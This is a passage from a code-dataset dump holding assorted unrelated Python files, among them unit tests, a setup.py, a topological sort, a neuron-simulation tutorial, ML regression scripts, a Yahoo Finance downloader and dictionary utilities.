_parse_json(filename):\n with open(filename, encoding='utf-8') as f:\n # We need to order the keys so that the data values are guaranteed\n # to correspond to the data member order, otherwise you get all kinds\n # of fun problems. Hence: OrderedDict!\n result = json.load(f, object_pairs_hook=collections.OrderedDict)\n return result\n\ndef _read_all_text(filename):\n with open(filename, encoding='utf-8') as f:\n file_text = f.read()\n return file_text\n\ndef _write_all_text(filename, text):\n with open(filename, mode='w', encoding='utf-8', newline='') as f:\n f.write(text)\n\nif __name__ == '__main__':\n generate_files(CONFIG);\n","sub_path":"ovum-vm/src/res/staticstrings.py","file_name":"staticstrings.py","file_ext":"py","file_size_in_byte":6565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"229741332","text":"# -*- coding: utf-8 -*-\nimport os\n\nfrom hamcrest import *\n\nfrom test.base import BaseTestCase\nfrom amplify.agent.util.tail import FileTail\n\n__author__ = \"Mike Belov\"\n__copyright__ = \"Copyright (C) 2015, Nginx Inc. 
All rights reserved.\"\n__credits__ = [\"Mike Belov\", \"Andrei Belov\", \"Ivan Poluyanov\", \"Oleg Mamontov\", \"Andrew Alexeev\"]\n__license__ = \"\"\n__maintainer__ = \"Mike Belov\"\n__email__ = \"dedm@nginx.com\"\n\n\nclass TailTestCase(BaseTestCase):\n test_log = 'log/something.log'\n test_log_rotated = 'log/something.log.rotated'\n\n def setup_method(self, method):\n # write something to create file\n self.write_log('start')\n\n def write_log(self, line):\n os.system('echo %s >> %s' % (line, self.test_log))\n \"\"\"\n with open(self.test_log, 'a+') as f:\n print 'writing \"%s\" to %s' % (line, f.name)\n f.writelines([line])\n \"\"\"\n\n def teardown_method(self, method):\n # remove test log\n for filename in (self.test_log, self.test_log_rotated):\n if os.path.exists(filename):\n os.remove(filename)\n\n super(TailTestCase, self).teardown_method(method)\n\n def test_read_new_lines(self):\n tail = FileTail(filename=self.test_log)\n\n # write messages and read them\n for i in xrange(10):\n line = \"this is %s line\" % i\n self.write_log(line)\n new_lines = tail.readlines()\n assert_that(new_lines, has_length(1))\n assert_that(new_lines.pop(), equal_to(line))\n\n def test_rotate(self):\n tail = FileTail(filename=self.test_log)\n\n # rotate it\n os.rename(self.test_log, self.test_log_rotated)\n\n # write something in a new one\n self.write_log(\"from a new file\")\n\n # read tail and get two lines\n new_lines = tail.readlines()\n assert_that(new_lines, has_length(1))\n assert_that(new_lines, equal_to(['from a new file']))\n\n def test_lose_changes_while_rotate(self):\n tail = FileTail(filename=self.test_log)\n\n # write something\n self.write_log(\"from the old file\")\n\n # rotate it\n os.rename(self.test_log, self.test_log_rotated)\n\n # write something in a new one\n self.write_log(\"from a new file\")\n\n # read tail and get two lines\n new_lines = tail.readlines()\n assert_that(new_lines, has_length(1))\n assert_that(new_lines, equal_to(['from a new file']))\n\n def test_no_new_lines(self):\n # check one new line\n tail = FileTail(filename=self.test_log)\n self.write_log('something')\n new_lines = tail.readlines()\n assert_that(new_lines, has_length(1))\n\n # check no new lines\n new_lines = tail.readlines()\n assert_that(new_lines, has_length(0))\n\n # and check again one new line\n tail = FileTail(filename=self.test_log)\n self.write_log('something')\n new_lines = tail.readlines()\n assert_that(new_lines, has_length(1))\n","sub_path":"test/unit/agent/util/tail.py","file_name":"tail.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"240733565","text":"from more_itertools import ilen\n\nfrom my.league import history\nfrom my.steam import games, achievements\n\n\ndef test_league() -> None:\n gs = list(history())\n assert len(gs) > 50\n assert len(gs[0].players) == 10\n\n\ndef test_steam() -> None:\n assert ilen(games()) > 10\n ach = list(achievements())\n assert any([a.game_name == \"Counter-Strike: Global Offensive\" for a in ach])\n","sub_path":"tests/test_games.py","file_name":"test_games.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"347268955","text":"\"\"\"\nsetup.py\n========\n\nThis is the setup.py script for Eelbrain.\n\nhttp://docs.python.org/distutils/index.html\n\n\"\"\"\n# Setuptools bootstrap module\n# http://pythonhosted.org//setuptools/setuptools.html\nfrom ez_setup 
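# The tests above pin down FileTail's rotation semantics: lines written to the
# old file after the tail was opened are dropped once the file is rotated. A
# minimal sketch of one common way to get that behaviour, via inode tracking
# (an assumption about the approach, not amplify's actual implementation):
import os

class MiniTail(object):
    def __init__(self, filename):
        self.filename = filename
        self._f = open(filename)
        self._f.seek(0, os.SEEK_END)  # start at the end, like `tail -f`
        self._ino = os.fstat(self._f.fileno()).st_ino

    def readlines(self):
        try:
            ino = os.stat(self.filename).st_ino
        except OSError:
            ino = self._ino  # file temporarily missing mid-rotation
        if ino != self._ino:
            # rotated: reopen the new file, dropping unread old-file lines
            self._f.close()
            self._f = open(self.filename)
            self._ino = ino
        return [line.rstrip('\n') for line in self._f.readlines()]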
import use_setuptools\nuse_setuptools('17')\n\nfrom distutils.version import StrictVersion\nimport re\nimport sys\nfrom setuptools import setup, find_packages, Extension\nimport numpy as np\n\n\nDESC = \"\"\"\nGitHub: https://github.com/christianbrodbeck/Eelbrain\n\"\"\"\n\n# version must be in X.X.X format, e.g., \"0.0.3dev\"\nwith open('eelbrain/__init__.py') as fid:\n text = fid.read()\nmatch = re.search(\"__version__ = '([.\\w]+)'\", text)\nif match is None:\n raise ValueError(\"No valid version string found in:\\n\\n\" + text)\nversion = match.group(1)\nif version != 'dev':\n s = StrictVersion(version) # check that it's a valid version\n\nif len(sys.argv) > 1:\n arg = sys.argv[1]\nelse:\n arg = None\n\n# Cython extensions\next = [\n Extension(\"eelbrain._stats.opt\", [\"eelbrain/_stats/opt.c\"]),\n Extension(\"eelbrain._stats.error_functions\",\n [\"eelbrain/_stats/error_functions.c\"])\n]\n\n# basic setup arguments\nkwargs = dict(name='eelbrain',\n version=version,\n description=\"MEG/EEG analysis tools\",\n url=\"http://eelbrain.readthedocs.io\",\n author=\"Christian Brodbeck\",\n author_email='christianbrodbeck@nyu.edu',\n license='GPL3',\n long_description=DESC,\n install_requires=['keyring >= 5',\n 'tex >= 1.8',\n 'mne >= 0.13.1',\n 'nibabel >= 2.0',\n 'tqdm >= 4.8',\n 'colormath >= 2.1'],\n extras_require={'full': ['numpy >= 1.8',\n 'scipy >= 0.16.0',\n 'matplotlib >= 1.1'],\n 'dev': ['cython >= 0.21',\n 'sphinx >= 1.1',\n 'numpydoc >= 0.5'],\n 'plot.brain': ['pysurfer[save_movie] >= 0.7']},\n include_dirs=[np.get_include()],\n packages=find_packages(),\n ext_modules=ext,\n )\n\n# Either PIL or Pillow is fine...\ntry:\n import PIL\nexcept ImportError:\n kwargs['install_requires'].append('pillow')\n\nsetup(**kwargs)\n\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"609717595","text":"class Project:\n def __init__(self, name):\n self.name = name\n self.incoming_edges = 0\n self.children = []\n self.map = {}\n\n def add_neighbor(self, node):\n if node.name not in self.map:\n self.children.append(node)\n self.map[node.name] = node\n node.incoming_edges += 1\n\n def __repr__(self):\n return self.name\n\n\nclass Graph:\n def __init__(self):\n self.nodes = []\n self.map = {}\n\n def get_or_create_node(self, name):\n if name not in self.map:\n node = Project(name)\n self.nodes.append(node)\n self.map[name] = node\n\n return self.map[name]\n\n def add_edge(self, start_name, end_name):\n start = self.get_or_create_node(start_name)\n end = self.get_or_create_node(end_name)\n start.add_neighbor(end)\n\n\ndef add_non_dependent(order_array, projects, offset):\n for p in projects:\n if p.incoming_edges == 0:\n order_array[offset] = p\n offset += 1\n return offset\n\n\ndef build_graph(projects, dependencies):\n graph = Graph()\n\n for p in projects:\n graph.get_or_create_node(p)\n\n for d in dependencies:\n graph.add_edge(d[0], d[1])\n return graph\n\n\ndef order_projects(projects):\n order_array = [None] * len(projects)\n\n end_of_list = add_non_dependent(order_array, projects, 0)\n\n to_be_processed = 0\n while to_be_processed < len(order_array):\n current = order_array[to_be_processed]\n\n # Dependency cycle\n if current is None:\n return None\n\n for c in current.children:\n c.incoming_edges -= 1\n\n end_of_list = add_non_dependent(order_array, current.children, end_of_list)\n to_be_processed += 1\n\n return order_array\n\n\nif __name__ == 
'__main__':\n my_projects = ['a', 'b', 'c', 'd', 'e', 'f']\n my_deps = [('a', 'd'), ('f', 'b'), ('b', 'd'), ('f', 'a'), ('d', 'c')]\n\n g = build_graph(my_projects, my_deps)\n print(order_projects(g.nodes))\n","sub_path":"chapter_4/7_build_order/remove_edges.py","file_name":"remove_edges.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"89986356","text":"'''\r\n\r\nIntroduction to Brian part 2: Synapses\r\n\r\nhttps://github.com/brian-team/brian2/blob/master/tutorials/2-intro-to-brian-synapses.ipynb\r\nSimulating spikes using Brian\r\n\r\n\r\n'''\r\n\r\nimport numpy as np\r\nimport math\r\nimport matplotlib.pyplot as plt\r\nfrom brian2 import *\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n \r\n # Define the neuron equation\r\n eqs = '''\r\n\r\n dv/dt = (I - v)/tau : 1\r\n I : 1\r\n tau : second\r\n\r\n '''\r\n\r\n num_neurons = 3\r\n\r\n # Define the neurongroup\r\n G = NeuronGroup(num_neurons ,\r\n eqs ,\r\n threshold = 'v>1',\r\n reset = 'v = 0',\r\n method = 'exact')\r\n\r\n # Define the Input for each neuron\r\n # We have 3 here\r\n G.I = [2 , 0 , 0]\r\n\r\n # Define time\r\n G.tau = [10 , 100 , 100] * ms\r\n\r\n\r\n # Define synapses\r\n S = Synapses(G , G , 'w : 1' , on_pre = 'v_post += w')\r\n S.connect(i = 0 , j = [1 , 2])\r\n S.w = 'j * 0.2'\r\n S.delay = 'j * 2 * ms'\r\n\r\n M = StateMonitor(G , 'v' , record = True)\r\n\r\n run(100 * ms)\r\n\r\n\r\n plt.plot(M.t/ms , M.v[0] , label = 'Neuron 0')\r\n plt.plot(M.t/ms , M.v[1] , label = 'Neuron 1')\r\n plt.plot(M.t/ms , M.v[2] , label = 'Neuron 2' , color = 'black')\r\n plt.xlabel('Time (ms)')\r\n plt.ylabel('v')\r\n plt.legend()\r\n plt.show()\r\n \r\n \r\n","sub_path":"b_snn_synapses_recap.py","file_name":"b_snn_synapses_recap.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"591596428","text":"# -*- coding:utf-8 -*-\n\nimport unittest\nfrom sqlalchemy.orm import joinedload_all\nfrom ..base import utils\nimport datetime\n\nimport csv\nimport logging\n\nfrom ..model.t_para import *\nlog = logging.getLogger()\n\nclass TestPara(unittest.TestCase):\n\n def setUp(self):\n self.session=simple_session()\n logging.debug(\"finish!!!\")\n init_para(self.session) \n \n def tearDown(self):\n logging.debug(\"finish!!!\")\n\ndef init_para(session):\n logging.debug(\"init tpara\")\n \n for k,v in tdict.items():\n rs = init_para_file(k,v)\n if k =='T_PARA_TYPE':\n for data in rs:\n session.add(T_Para_Type(**data))\n if k =='T_PARA_DETAIL':\n for data in rs:\n session.add(T_Para_Detail(**data))\n if k =='T_PARA_ROW':\n for data in rs:\n session.add(T_Para_Row(**data))\n if k =='T_PARA_HEADER':\n for data in rs:\n session.add(T_Para_Header(**data))\n\n session.commit()\n\ntdict = {\n 'T_PARA_TYPE':[\"ID\",\"TYPE_STATUS\",\"TYPE_NAME\", \"TYPE_MODULE\",\"TYPE_KEY\" ,\"TYPE_DETAIL\" ],\n 'T_PARA_ROW':[\"ID\" ,\"PARA_TYPE_ID\" ,\"ROW_NUM\", \"ROW_STATUS\" ,\"ROW_START_DATE\",\"ROW_END_DATE\"],\n 'T_PARA_HEADER':[\"ID\",\"PARA_TYPE_ID\",\"HEADER_NAME\" ,\"HEADER_KEY\" ,\"HEADER_ORDER\" ,\"HEADER_DETAIL\" ,\"HEADER_TYPE\" ,\"HEADER_STATUS\" ],\n 'T_PARA_DETAIL':[\"ID\",\"PARA_HEADER_ID\" ,\"PARA_ROW_ID\",\"DETAIL_VALUE\",\"DETAIL_KEY\"]\n}\n\ndef init_para_file(type,fildlist):\n path = \"%s.del\"%type\n csv_reader = csv.reader(path)\n rs =[]\n for row in csv_reader:\n data={}\n i = 0\n for item in row:\n data[fildlist[i]] = item\n return 
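# order_projects above is Kahn's algorithm written against a preallocated
# array; hitting a None slot means a node never reached zero incoming edges,
# i.e. a dependency cycle. The same idea in a compact deque-based sketch
# (an assumed rewrite, not part of the source):
from collections import deque

def topo_order(projects, dependencies):
    children = {p: [] for p in projects}
    incoming = {p: 0 for p in projects}
    for start, end in dependencies:
        children[start].append(end)
        incoming[end] += 1
    queue = deque(p for p in projects if incoming[p] == 0)
    order = []
    while queue:
        current = queue.popleft()
        order.append(current)
        for child in children[current]:
            incoming[child] -= 1
            if incoming[child] == 0:
                queue.append(child)
    return order if len(order) == len(projects) else None  # None == cycle

order = topo_order(['a', 'b', 'c', 'd', 'e', 'f'],
                   [('a', 'd'), ('f', 'b'), ('b', 'd'), ('f', 'a'), ('d', 'c')])
assert order is not None and order.index('f') < order.index('a') < order.index('d')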
rs\n","sub_path":"src_20170503/src/web/server/fabs/tests/test_tpara.py","file_name":"test_tpara.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"289188642","text":"#!/usr/bin/env python\n\nfrom floe.api import WorkFloe\n\nfrom orionplatform.cubes import DatasetReaderCube, DatasetWriterCube\n\nfrom MDOrion.TrjAnalysis.cubes_clusterAnalysis import ParallelClusterOETrajCube, ParallelMakeClusterTrajOEMols\n\njob = WorkFloe(\"Testing Traj OEMol Clustering on a conformer\")\n\njob.description = \"\"\"\nTesting Ligand Clustering Floe on a conformer\n#\nEx. python floes/ConfBasedTrajClustering.py --in STMD_TrajOEMol.oedb --out STMD_LigClus.oedb\n#\nParameters:\n-----------\nin (.oedb file): file of the MD results with Traj OEMols\n#\nOutputs:\n--------\nofs (.oedb file): file of the MD results with Traj OEMol Clustering on a conformer.\n\"\"\"\n\n# job.uuid = \"7cacc2af-cae7-4dc7-8956-fcf539861e3d\"\n\nifs = DatasetReaderCube(\"ifs\")\n\nifs.promote_parameter(\"data_in\", promoted_name=\"in\", title=\"System Input OERecord\", description=\"OERecord file name\")\n\nclusCube = ParallelClusterOETrajCube(\"ClusterOETrajCube\")\nclusOEMols = ParallelMakeClusterTrajOEMols('MakeClusterTrajOEMols')\n\nofs = DatasetWriterCube('ofs', title='OFS-Success')\nofs.promote_parameter(\"data_out\", promoted_name=\"out\", title=\"System Output OERecord\", description=\"OERecord file name\")\n\njob.add_cubes(ifs, clusCube, clusOEMols, ofs)\n\nifs.success.connect(clusCube.intake)\nclusCube.success.connect(clusOEMols.intake)\nclusOEMols.success.connect(ofs.intake)\n\nif __name__ == \"__main__\":\n job.run()\n","sub_path":"floes_dev/ConfBasedTrajClustering_floe.py","file_name":"ConfBasedTrajClustering_floe.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"168300326","text":"import argparse\nimport csv\nfrom os.path import abspath\nfrom sklearn.model_selection import train_test_split\n\nfrom configuration.configuration_constants import excluded_values, \\\n file_name_predicted_price_categories_values, \\\n target_column_name, \\\n limit_date, \\\n path_to_trained_models\nfrom classification_module import CalculateValue, \\\n ClassificationLogisticRegressionModel, \\\n get_model\nfrom utils.database_handler import DatabaseHandler\nfrom utils.file_names_builder import make_file_name\nfrom utils.serialization_module import create_logger\n\nquery_step_iterate = 200000\n\nparser = argparse.ArgumentParser(description='Program to predict category of land price.')\nparser.add_argument('--save_to_database',\n action='store_true',\n default=False,\n help='Specify whether to save the values into the database.')\nparser.add_argument('--model_overwrite',\n action='store_true',\n default=False,\n help='Specify whether to override the model.')\n\nlogger = create_logger()\n\n\ndef classification_regression_with_test_set():\n database_handler = DatabaseHandler()\n query = \"EXEC dbo.GetDataToTrainClassificationModel @LimitDate = {}, @ExcludedList ='{}'\".format(limit_date,\n excluded_values)\n data = database_handler.execute_query(query)\n train, test = train_test_split(data, test_size=0.2)\n model = ClassificationLogisticRegressionModel(input_data=train, target_column_name=target_column_name)\n prediction = CalculateValue(model).predict(data_to_predict=test)\n from sklearn.metrics import accuracy_score\n 
print(accuracy_score(y_true=test[target_column_name], y_pred=prediction))\n database_handler.close_connection()\n for predictionItem, realItem in zip(prediction, test[target_column_name]):\n if predictionItem != realItem:\n print(predictionItem)\n print(realItem)\n print(\"\\n\")\n\n\ndef classification_regression(save_to_database=False, overwrite_model=False):\n database_handler = DatabaseHandler()\n model_file_name = make_file_name(base_name=path_to_trained_models + \"classification_\",\n _limit_date=limit_date,\n extension='.sav')\n\n model = get_model(\"EXEC dbo.GetDataToTrainClassificationModel @LimitDate = {}, @ExcludedList ='{}'\"\n .format(limit_date, excluded_values),\n target_column=target_column_name,\n model_file_name=abspath(model_file_name),\n database_handler=database_handler,\n overwrite=overwrite_model)\n\n min_max_object_id = \\\n database_handler.execute_query(\"EXEC dbo.GetMinimumAndMaxumimObjectID_ParcelVectors \"\n \"@LimitDate = {}, @ExcludedList ='{}'\"\n .format(limit_date, excluded_values))\n min_object_id = min_max_object_id.iloc[0][\"MinimumObjectID\"]\n max_object_id = min_max_object_id.iloc[0][\"MaximumObjectID\"]\n try:\n with open(make_file_name(file_name_predicted_price_categories_values, extension='.csv'), mode='a') \\\n as estimated_bucket_values:\n estimated_bucket_writer = csv.writer(estimated_bucket_values,\n delimiter=',',\n quotechar='\"',\n quoting=csv.QUOTE_MINIMAL)\n\n tmp_min = min_object_id\n while tmp_min < max_object_id:\n if tmp_min + query_step_iterate < max_object_id:\n tmp_max = tmp_min + query_step_iterate\n else:\n tmp_max = max_object_id\n df_parcels_to_estimate_price_group = database_handler.execute_query(\n \"EXEC dbo.GetDataToParcelClassification \"\n \"@LimitDate = {}, @ExcludedList='{}', @ObjectIdMin = {}, @ObjectIdMax = {}\"\n .format(limit_date, excluded_values, tmp_min, tmp_max))\n prediction = CalculateValue(model).predict(data_to_predict=df_parcels_to_estimate_price_group)\n for (prediction_value, object_id) in zip(prediction, df_parcels_to_estimate_price_group['OBJECTID']):\n if save_to_database:\n query = (\"EXEC dbo.UpdateEstimatedPriceCategoryGroup \"\n \"@NEW_Estimated_Price_Group = {}, @ObjectID = {} \"\n .format(prediction_value, object_id))\n database_handler.cursor.execute(query)\n database_handler.conn.commit()\n\n estimated_bucket_writer.writerow([object_id, prediction_value])\n\n tmp_min = tmp_max\n finally:\n database_handler.close_connection()\n logger.info('Classification prediction is done.')\n\n\nif __name__ == '__main__':\n args = parser.parse_args()\n classification_regression(save_to_database=args.save_to_database, overwrite_model=args.model_overwrite)\n","sub_path":"parcels_valuation/src/init_classification.py","file_name":"init_classification.py","file_ext":"py","file_size_in_byte":5244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"314308773","text":"import csv\nimport numpy as np\nimport pandas as pd\nfrom sklearn.neural_network import MLPRegressor\n\ndef neural_network_sklearn(x,y,nx):\n\n neuralNetwork = MLPRegressor(solver='lbfgs', alpha=0.0005)\n model = neuralNetwork.fit(x,y)\n\n ny = neuralNetwork.predict(nx)\n\n out = open('test-A\\out.tsv', 'w')\n for nyi in ny:\n out.write(str(nyi)+'\\n')\n print(nyi)\n\ndef normalize(dataset):\n \n dataset = dataset[['Powierzchnia w m2', 'Liczba pokoi', 'Rok budowy', 'Piętro']]\n dataset = dataset.replace({'parter':0, 'poddasze': 0}, regex = True)\n 
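# The prediction loop above walks OBJECTIDs in fixed windows of
# query_step_iterate rows. The same windowing isolated as a reusable generator
# (a hypothetical helper, not part of this project):
def id_windows(min_id, max_id, step):
    lo = min_id
    while lo < max_id:
        hi = min(lo + step, max_id)
        yield lo, hi
        lo = hi

assert list(id_windows(0, 5, 2)) == [(0, 2), (2, 4), (4, 5)]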
dataset['Piętro'].fillna(round(dataset['Piętro'].median(), 0), inplace = True)\n dataset['Rok budowy'].fillna(round(dataset['Rok budowy'].median(), 0), inplace = True)\n return dataset\n\ndef import_data():\n\n reader = pd.read_csv('train/train.tsv', delimiter ='\\t')\n columns = reader.columns[1:]\n test = pd.read_csv('test-A/in.tsv', delimiter ='\\t', header = None, names = columns)\n\n y = reader['cena']\n x = normalize(reader)\n nx = normalize(test)\n\n return (x,y,nx)\n\ndef main():\n \n import_xy = import_data()\n x = import_xy[0]\n y = import_xy[1]\n nx = import_xy[2]\n\n neural_network_sklearn(x,y,nx)\n \n\nif __name__== \"__main__\":\n \n main()\n","sub_path":"mieszkania4/program_neural.py","file_name":"program_neural.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"450966144","text":"import datetime as dt\nimport time as tm\nimport csv\nimport requests\n\nYF_EXPORT_URL = 'https://query1.finance.yahoo.com/v7/finance/download/{ticker}?period1={period_start}&period2={period_end}&interval=1d&events=history&includeAdjustedClose=true'\n\n\ndef get_csv_url(csv_url):\n \"\"\"\n Take a csv url and return the data as a list of lists\n \"\"\"\n with requests.Session() as s:\n download = s.get(csv_url)\n\n decoded_content = download.content.decode('utf-8')\n\n cr = csv.reader(decoded_content.splitlines(), delimiter=',')\n return list(cr)\n\n\ndef export_stock_historical_data(stock_ticker, start_datetime, end_datetime):\n \"\"\"\n Take a stock ticker symbol, a datetime start, and a datetime end, \n \n return yahoo finance daily data for time range as a list of lists\n \"\"\"\n\n start_unix = int(tm.mktime(start_datetime.date().timetuple()))\n end_unix = int(tm.mktime(end_datetime.date().timetuple()))\n\n csv_url = YF_EXPORT_URL.format(\n ticker=stock_ticker,\n period_start=start_unix,\n period_end=end_unix\n )\n return get_csv_url(csv_url)\n","sub_path":"utils/yahoo_finance.py","file_name":"yahoo_finance.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"584869210","text":"import time\ndef tprint(obj, except_word=\"\"):\n \"\"\"\n #脚本编辑打印辅助工具\n ┏━━━━┳━━┓\n ┃传入值 ┃类型┃\n ┣━━━━╋━━┫\n ┃任何变量┃ all┃\n ┗━━━━┻━━┛\n #要复制到编写的函数中使用,不可跨py使用\n \"\"\"\n for name, item in globals().items():\n if item == obj and name != except_word:\n print(name + ':',type(obj))\n print(obj)\n print()\n\ndef if_differ_str(_first, _second):\n \"\"\"\n #传入两个值将两个值转换为str进行对比\n #如果两个是一致的那么返回值1,如果两个值不同返回0\n :param _first: 第一个字符串\n :param _second: 第二个字符串\n :return: 比较结果\n \"\"\"\n _first=str(_first)\n _second=str(_second)\n if _first == _second:\n return_value = 1\n else:\n return_value = 0\n return return_value\n\n\ndef getLastDict(_dict):\n \"\"\"\n 将字典里面的最后一个键值对取出\n :param _dict: 要被取出的字典\n :return: 最后的一对键值对\n \"\"\"\n _list = list(_dict.keys())\n length = len(_list)\n dict_key = _list[length - 1]\n result_value = _dict[dict_key]\n return dict_key, result_value\n\ndef dict_JieQuBanDuan(_dict,key,diction='right'):\n \"\"\"\n #截取传入key的前半段或者后半段\n #前半段left后半段rignt\n #{.........left........|........right..........}\n :param _dict: 要被截取的dict\n :param key: 要截取段中的键值\n :param diction: 方向,截取方向,向后或者向前(left/right)\n :return: 截取到的dict\n \"\"\"\n in_time = key\n _list = list(_dict.keys())\n a = _list.index(in_time)\n final_dict = {}\n if diction == 'left':\n for i in range(a + 1):\n value = _dict[_list[i]]\n assembly_dict = eval(\"{'\" + 
str(_list[i]) + \"':\" + str(value) + \"}\")\n final_dict.update(assembly_dict)\n elif diction == 'right':\n _list_right = _list[a:]\n for i in _list_right:\n value = _dict[i]\n assembly_dict = eval(\"{'\" + str(i) + \"':\" + str(value) + \"}\")\n final_dict.update(assembly_dict)\n else:\n print('参数错误')\n return final_dict\n\n\n\ndef value_2_key(_dict,_value):\n\n \"\"\"\n #传入字典和字典内存在的value,返回其value的key值\n 知道value反推可以,尽量保证value单一\n :param _dict: 被筛选的dict\n :param _value: 要找到的value值\n :return: key值\n \"\"\"\n try:\n a1 = list(_dict.keys())[list(_dict.values()).index(_value)]\n except Exception as e:\n print('value 2 key出错')\n print(e)\n return a1\n\n\n\ndef find_max_or_min_in_list(_list=[],_geshu=1,max_or_min='max'):\n \"\"\"\n 返回list中最大的几个值,或者最小的几个值\n :param _list: 要进行比较的list\n :param _geshu: 取出最值的个数\n :param max_or_min: 输入为\"max\"或者是\"min\"表示要取出的是最大还是最小\n :return: 取出的几个最值\n \"\"\"\n _return_list = []\n if len(_list)<=_geshu:\n print(\"传入长度小于取值个数\")\n else:\n if max_or_min=='max':\n for i in range(_geshu):\n return_value = max(_list)\n _list.remove(return_value)\n _return_list.append(return_value)\n elif max_or_min=='min':\n for i in range(_geshu):\n return_value = min(_list)\n _list.remove(return_value)\n _return_list.append(return_value)\n else:\n print('未接收到最大/最小取值')\n return _return_list\n\n\ndef find_dict_key_and_fetch_value_to_list(_dict={},_key_list=[]):\n \"\"\"\n 遍历字典将list中的值对应字典中的key的值取出\n :param _dict: dict数据\n :param _key_list: 要取出的键的列表\n :return: 取出的dict\n \"\"\"\n return_list = []\n for i in _key_list:\n return_list_value = _dict[i]\n return_list.append(return_list_value)\n return return_list\n\n\n\ndef dict_cut_out_piece_in_sequence(_dict,start_position,end_num=1):\n \"\"\"\n 从字典中选择一个起始位置向后截取end_num个键值对并返回\n start_position为dict中想要开始截取的起始未知的key\n :param _dict: 要被截取的dict\n :param start_position: 起始位置(该位置的键值)\n :param end_num: 截取到该位置后的第几个\n :return: 返回截取的dict段\n \"\"\"\n try:\n _list = list(_dict.keys())\n num_s = _list.index(start_position)\n ifcode = len(_list)-(num_s+end_num)\n if ifcode<0:\n end_num = len(_list) - num_s\n e1 = '截取值溢出,修改截取值为最末位'+str(end_num)\n\n else:\n #pass\n num_e = num_s+int(end_num)\n _list = _list[num_s:num_e]\n return_dict = {}\n for i in _list:\n return_dict_update =eval(\"{'\"+str(i)+\"':'\"+str(_dict[i])+\"'}\")\n return_dict.update(return_dict_update)\n return return_dict\n except Exception as e:\n print(e)\n\ndef fetch_dict_by_num(_dict, num):\n \"\"\"\n 取出字典中顺序的第num个\n :param _dict: 要取出的字典数据\n :param num: 要取第num个\n :return: 第num个键值对\n \"\"\"\n _dict = _dict\n _list = list(_dict.keys())\n i = _list[num - 1] # num-1\n i_value = _dict[i]\n strings = \"{'\" + str(i) + \"':\" + str(i_value) + \"}\"\n return_dict = eval(strings)\n return return_dict\n\ndef abandon_front_section_dict(dict={},num=1):\n \"\"\"\n 舍弃掉list中前几个键值对,如果舍弃个数大于整个dict的键值对个数将会报错\n :param dict: 将要被舍弃的dict\n :param num: 舍弃前面键值对的个数\n :return: 被舍弃后的dict\n \"\"\"\n _keylist=list(dict.keys())\n if num>len(_keylist):\n print(\"舍弃个数长于字典键值对个数\")\n else:\n abandonlist = []\n while 1<2:\n if num>0:\n value = _keylist[num-1]\n abandonlist.append(value)\n num=num-1\n else:\n break\n for i1 in list(abandonlist):\n dict.pop(i1)\n return dict\n\ndef fetch_maxormin_key_pairs(indict={},maxormin='max',num=1):\n \"\"\"\n 取出最大或者最小的键值对\n :param dict: 要处理的字典\n :param maxormin: 输入为最大或者最小max,min\n :param num: 取多少个\n :return: 返回值为取出最大/最小的键值对的字典\n \"\"\"\n dict = indict\n controlnum = 1\n while 1<2:\n returndict={}\n if len(dict)=float(dict[i]):\n dict_value=float(dict[i])\n madedict = 
{str(i):str(dict_value)}\n else:\n print('请输入正确的取值,max/min:')\n maxormin=input()\n continue\n returndict.update(madedict)\n dict.pop(i)\n controlnum=controlnum+1\n if controlnum>num:\n return returndict\n break\n\ndef Erase_delete_corresponding_value(dict,value):\n \"\"\"\n 遍历dict删除对应value值的键值对\n :param dict:待处理字典\n :param value:要去掉的value值\n :return:处理完成的字典\n \"\"\"\n keylist=list(dict.keys())\n for i in keylist:\n ifcode = dict[i]\n if ifcode == value:\n dict.pop(i)\n else:\n pass\n return dict\n\ndef daysUnix():\n #获取今日的时间戳(今日0时)\n now_time = int(time.time())\n day_time = now_time - now_time % 86400 + time.timezone\n unix=str(day_time)+\"000\"\n return unix\n\n\n\nif __name__ == '__main__':\n _dict = {'a':3,'b':2,'c':3,'d':4}","sub_path":"DATA_PROCESSING/BASE_CONDITIONING_MODES_AND_FUCTIONS/self_encapsulation_scripts.py","file_name":"self_encapsulation_scripts.py","file_ext":"py","file_size_in_byte":8211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"116967004","text":"#encoding=utf-8\nimport logging\nimport signal\nimport functools\nfrom yuanneng.core import network\nfrom cProfile import Profile\nfrom copy import copy\nfrom time import time\nfrom yuanneng.utils import rand_str\nfrom yuanneng.cfg import is_open_cpu_profiler\nfrom yuanneng import scheduler_manager\n\nif is_open_cpu_profiler:\n profiler = Profile()\n\n__all__ = ['HeartBeat','call_out','remove_call_out']\n\ndef init():\n \"\"\"heartbeat初始化方法\n 应在应用程序启动时调用一次\n \"\"\"\n global objset,remove_set,shutdown,callout_set,beating\n objset = set()\n remove_set = set()\n beating = False\n shutdown = False\n callout_set = set()\n\n global hb_flag\n hb_flag = False\n signal.signal(signal.SIGALRM,_set_hb_flag)\n signal.siginterrupt(signal.SIGALRM,False)\n\ndef start():\n 